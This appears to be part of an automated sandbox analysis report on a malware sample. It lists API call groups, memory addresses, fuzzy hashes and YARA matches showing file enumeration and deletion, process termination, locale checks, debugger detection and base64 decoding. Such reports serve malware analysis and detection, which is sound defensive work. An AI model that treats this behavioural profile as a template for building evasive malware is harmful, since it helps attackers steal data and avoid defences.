                                            • Opcode Fuzzy Hash: 072d83594ea58ce967a702448e93c4203c63cf1f112459f6011fb68e56ccc3d7
                                            • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                            • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                            • FindClose.KERNEL32(000000FF), ref: 00401E72
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 1415058207-1173974218
                                            • Opcode ID: e3236939d64b81c8e2535d8948c0715255ee738f44246ce4ab20f9b4c07e84b5
                                            • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                            • Opcode Fuzzy Hash: e3236939d64b81c8e2535d8948c0715255ee738f44246ce4ab20f9b4c07e84b5
                                            • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                            APIs
                                            • wsprintfA.USER32 ref: 023FF0A5
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023FF0BC
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 023FF112
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 023FF128
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FF615
                                            • FindClose.KERNEL32(000000FF), ref: 023FF62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction ID: 53edf8f1a5b7dbe55789e811adb8a9fe007e41adf2260c024a18e8a1df207208
                                            • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction Fuzzy Hash: 53E1AB729013289ADB59EB61DC94EEE733AAF54301F4045AEA64A620D1EF305FC9CF90
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                            • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 0d42fc7c8bfb5a624031ccfdbbde077ea7a6cbd97b9e622b22617585481770b2
                                            • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                            • Opcode Fuzzy Hash: 0d42fc7c8bfb5a624031ccfdbbde077ea7a6cbd97b9e622b22617585481770b2
                                            • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 023FDE52
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 023FDE9A
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 023FDEB0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FE133
                                            • FindClose.KERNEL32(000000FF), ref: 023FE145
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction ID: c2220ee2d1911dde10ca79ca9e098f4bfcdcf07a255f6a844a43531afd2482ca
                                            • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction Fuzzy Hash: F39134729002189BCB14FBB1ED99DED737AAF95301F0045BEEA4A56190FE349B48CF91
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 023FFA85
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 023FFAD6
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 023FFAEC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FFE18
                                            • FindClose.KERNEL32(000000FF), ref: 023FFE2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction ID: 27c7d8d52808cc51103ee7c4bb1a2d2bcd6682dfd1e84ea7d3c33fb123744a27
                                            • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction Fuzzy Hash: 0DB110719003289BCB24FB65DC94EEE737AAF94300F4045AEDA4A565D1EF305B88CF91
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                            • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                            • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                            • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                            • CloseHandle.KERNEL32(00000000), ref: 00419987
                                            • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409B6C
                                            • Process32First.KERNEL32(023FA245,00000128), ref: 02409B80
                                            • Process32Next.KERNEL32(023FA245,00000128), ref: 02409B95
                                            • StrCmpCA.SHLWAPI(?,023FA245), ref: 02409BAA
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02409BC3
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02409BE1
                                            • CloseHandle.KERNEL32(00000000), ref: 02409BEE
                                            • CloseHandle.KERNEL32(023FA245), ref: 02409BFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 65c23cc896cf1a7330737837a6d64267cea15d20df1f6f082afb329ca91ec75c
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: BB112175D05218EBCB24DFA5DC88BDE7779BB48704F008599F505A6280EB349B84CF51
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID: \*.*$@
                                            • API String ID: 433455689-2355794846
                                            • Opcode ID: 74679944e1b616d55cc5aebd76ef12a98ef731a73dcca30ac8f6a3e26472430f
                                            • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                            • Opcode Fuzzy Hash: 74679944e1b616d55cc5aebd76ef12a98ef731a73dcca30ac8f6a3e26472430f
                                            • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 023F1BCA
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 023F1C1A
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 023F1C30
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023F1FE7
                                            • DeleteFileA.KERNEL32(00000000), ref: 023F2071
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023F20C7
                                            • FindClose.KERNEL32(000000FF), ref: 023F20D9
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 1415058207-0
                                            • Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                            • Instruction ID: bf708715c7676596011d980432e9fe912d8045add58cfd6f9debf14d20d01a80
                                            • Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                            • Instruction Fuzzy Hash: 421297719403289ACB19FB61DC94EEE737AAF54305F4045BEA64A660D0EF746BC8CF90
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 023FE1C5
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 023FE215
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 023FE22B
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FE747
                                            • FindClose.KERNEL32(000000FF), ref: 023FE759
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2325840235-0
                                            • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction ID: 1af9b67377813a5b9050333d00200ae62292ee68a4403a620d7d095c7ce99b0b
                                            • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction Fuzzy Hash: 27F17B719542289ACB19FB61DCD4EEE733AAF54701F8045EF925A620A0EF306F89CF50
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                            • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID: /
                                            • API String ID: 3090951853-4001269591
                                            • Opcode ID: c2c974241ca56b7039442d952b647a70f4f32b71e0b942e61baaf038a649e65f
                                            • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                            • Opcode Fuzzy Hash: c2c974241ca56b7039442d952b647a70f4f32b71e0b942e61baaf038a649e65f
                                            • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                            APIs
                                            • memset.MSVCRT ref: 0040C953
                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A6DBB0), ref: 0040C971
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                            • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                            • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                            • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                            APIs
                                            • memset.MSVCRT ref: 023FCBBA
                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023FCBD8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023FCBE3
                                            • memcpy.MSVCRT(?,?,?), ref: 023FCC79
                                            • lstrcat.KERNEL32(?,00420B47), ref: 023FCCAA
                                            • lstrcat.KERNEL32(?,00420B4B), ref: 023FCCBE
                                            • lstrcat.KERNEL32(?,00420B4E), ref: 023FCCDF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction ID: fd7c54632af3e0fa3b650cf910dd5ab509cc95b7defc16f0075bb2f8055763fc
                                            • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction Fuzzy Hash: 824151B4D4421DDBDB10CF90DD88BEEB7B9BB44304F1045AAF609A6280D7745B84CF91
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                            • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID: eM
                                            • API String ID: 2579439406-4107679315
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                            • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID: >O@
